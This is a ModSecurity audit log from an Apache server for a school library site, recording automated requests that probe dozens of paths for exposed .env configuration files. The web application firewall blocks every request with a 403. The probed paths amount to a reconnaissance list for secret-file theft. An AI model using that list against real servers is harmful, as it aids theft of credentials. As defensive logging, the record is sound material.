combined=306, p1=253, p2=0, p3=0, p4=0, p5=53, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65b2e310-Z-- --8c102968-A-- [06/Jun/2025:05:50:01 +0700] aEIfGdKrQJH3faNNWWAXCQAAAM4 103.236.140.4 48208 103.236.140.4 8181 --8c102968-B-- GET /laravel/.env.staging HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236193 --8c102968-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8c102968-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801043517 639 (- - -) Stopwatch2: 1749163801043517 639; combined=249, p1=223, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c102968-Z-- --d580841d-A-- [06/Jun/2025:05:50:01 +0700] aEIfGdKrQJH3faNNWWAXCgAAANI 103.236.140.4 48212 103.236.140.4 8181 --d580841d-B-- GET /laravel/core/.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412808 --d580841d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d580841d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801224270 698 (- - -) Stopwatch2: 1749163801224270 698; combined=280, p1=247, p2=0, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d580841d-Z-- --997c6667-A-- [06/Jun/2025:05:50:01 +0700] aEIfGdKrQJH3faNNWWAXCwAAANQ 103.236.140.4 48216 103.236.140.4 8181 --997c6667-B-- GET /laravel/core/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236196 --997c6667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --997c6667-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801405403 694 (- - -) Stopwatch2: 1749163801405403 694; combined=278, p1=245, p2=0, p3=0, p4=0, p5=32, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --997c6667-Z-- --9a68b072-A-- [06/Jun/2025:05:50:01 +0700] aEIfGWaFzeU7VUj_TDFz0AAAABY 103.236.140.4 48220 103.236.140.4 8181 --9a68b072-B-- GET /laravel/core/.env.staging HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412811 --9a68b072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9a68b072-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801586610 681 (- - -) Stopwatch2: 1749163801586610 681; combined=258, p1=228, p2=0, p3=0, p4=0, p5=29, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a68b072-Z-- --4efb6453-A-- [06/Jun/2025:05:50:01 +0700] aEIfGeJsrKcXA4Tjex0GjgAAAE4 103.236.140.4 48224 103.236.140.4 8181 --4efb6453-B-- GET /main/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236199 --4efb6453-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4efb6453-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801767623 757 (- - -) Stopwatch2: 1749163801767623 757; combined=321, p1=288, p2=0, p3=0, p4=0, p5=32, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4efb6453-Z-- --66588b44-A-- [06/Jun/2025:05:50:01 +0700] aEIfGdKrQJH3faNNWWAXDAAAANY 103.236.140.4 48228 103.236.140.4 8181 --66588b44-B-- GET /node_modules/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412814 --66588b44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --66588b44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801948593 769 (- - -) Stopwatch2: 1749163801948593 769; combined=300, p1=267, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66588b44-Z-- --aa038b31-A-- [06/Jun/2025:05:50:03 +0700] aEIfG-JsrKcXA4Tjex0GkgAAAFM 103.236.140.4 48234 103.236.140.4 8181 --aa038b31-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236209 --aa038b31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa038b31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803222242 939 (- - -) Stopwatch2: 1749163803222242 939; combined=382, p1=342, p2=0, p3=0, p4=0, p5=40, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa038b31-Z-- --9a68b072-A-- [06/Jun/2025:05:50:03 +0700] aEIfG-JsrKcXA4Tjex0GkwAAAFQ 103.236.140.4 48248 103.236.140.4 8181 --9a68b072-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412825 --9a68b072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9a68b072-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803403674 764 (- - -) Stopwatch2: 1749163803403674 764; combined=275, p1=246, p2=0, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a68b072-Z-- --910cb443-A-- [06/Jun/2025:05:50:03 +0700] aEIfG9KrQJH3faNNWWAXDQAAANg 103.236.140.4 48252 103.236.140.4 8181 --910cb443-B-- GET /.env.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236212 --910cb443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --910cb443-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803584769 672 (- - -) Stopwatch2: 1749163803584769 672; combined=260, p1=229, p2=0, p3=0, p4=0, p5=30, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --910cb443-Z-- --55b77514-A-- [06/Jun/2025:05:50:03 +0700] aEIfG9KrQJH3faNNWWAXDgAAAME 103.236.140.4 48256 103.236.140.4 8181 --55b77514-B-- GET /.env.example HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412828 --55b77514-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --55b77514-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803765362 698 (- - -) Stopwatch2: 1749163803765362 698; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55b77514-Z-- --33e9633b-A-- [06/Jun/2025:05:50:03 +0700] aEIfG9KrQJH3faNNWWAXDwAAAMQ 103.236.140.4 48260 103.236.140.4 8181 --33e9633b-B-- GET /.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236215 --33e9633b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --33e9633b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803946136 684 (- - -) Stopwatch2: 1749163803946136 684; combined=278, p1=245, p2=0, p3=0, p4=0, p5=32, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33e9633b-Z-- --b2de145f-A-- [06/Jun/2025:05:50:04 +0700] aEIfHNKrQJH3faNNWWAXEAAAAMU 103.236.140.4 48264 103.236.140.4 8181 --b2de145f-B-- GET /.env.old HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412831 --b2de145f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b2de145f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804126767 669 (- - -) Stopwatch2: 1749163804126767 669; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2de145f-Z-- --841d4f1b-A-- [06/Jun/2025:05:50:04 +0700] aEIfHNKrQJH3faNNWWAXEQAAAMk 103.236.140.4 48268 103.236.140.4 8181 --841d4f1b-B-- GET /.env.prod HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236218 --841d4f1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --841d4f1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804307681 658 (- - -) Stopwatch2: 1749163804307681 658; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --841d4f1b-Z-- --a7cadc58-A-- [06/Jun/2025:05:50:04 +0700] aEIfHNKrQJH3faNNWWAXEgAAAMo 103.236.140.4 48272 103.236.140.4 8181 --a7cadc58-B-- GET /.env.production.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412834 --a7cadc58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a7cadc58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804488384 728 (- - -) Stopwatch2: 1749163804488384 728; combined=310, p1=278, p2=0, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7cadc58-Z-- --1a993a46-A-- [06/Jun/2025:05:50:04 +0700] aEIfHPHwHPygw9BuFzQ1vwAAAIU 103.236.140.4 48276 103.236.140.4 8181 --1a993a46-B-- GET /.env.stage HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236221 --1a993a46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a993a46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804669169 717 (- - -) Stopwatch2: 1749163804669169 717; combined=293, p1=257, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a993a46-Z-- --a78d8a2f-A-- [06/Jun/2025:05:50:04 +0700] aEIfHNKrQJH3faNNWWAXEwAAAMs 103.236.140.4 48280 103.236.140.4 8181 --a78d8a2f-B-- GET /admin/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412837 --a78d8a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a78d8a2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804849956 685 (- - -) Stopwatch2: 1749163804849956 685; combined=283, p1=249, p2=0, p3=0, p4=0, p5=34, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a78d8a2f-Z-- --32252111-A-- [06/Jun/2025:05:50:05 +0700] aEIfHdKrQJH3faNNWWAXFAAAAM8 103.236.140.4 48284 103.236.140.4 8181 --32252111-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236224 --32252111-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --32252111-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163805030873 696 (- - -) Stopwatch2: 1749163805030873 696; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32252111-Z-- --b1f7d14e-A-- [06/Jun/2025:05:50:05 +0700] aEIfHdKrQJH3faNNWWAXFQAAANA 103.236.140.4 48288 103.236.140.4 8181 --b1f7d14e-B-- GET /apps/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412840 --b1f7d14e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b1f7d14e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163805211812 29224 (- - -) Stopwatch2: 1749163805211812 29224; combined=57243, p1=250, p2=0, p3=0, p4=0, p5=28540, sr=79, sw=1, l=0, gc=28452 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1f7d14e-Z-- --0d4c297d-A-- [06/Jun/2025:06:19:51 +0700] aEImF-JsrKcXA4Tjex0GqQAAAEk 103.236.140.4 48588 103.236.140.4 8181 --0d4c297d-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) Accept-Charset: utf-8 --0d4c297d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 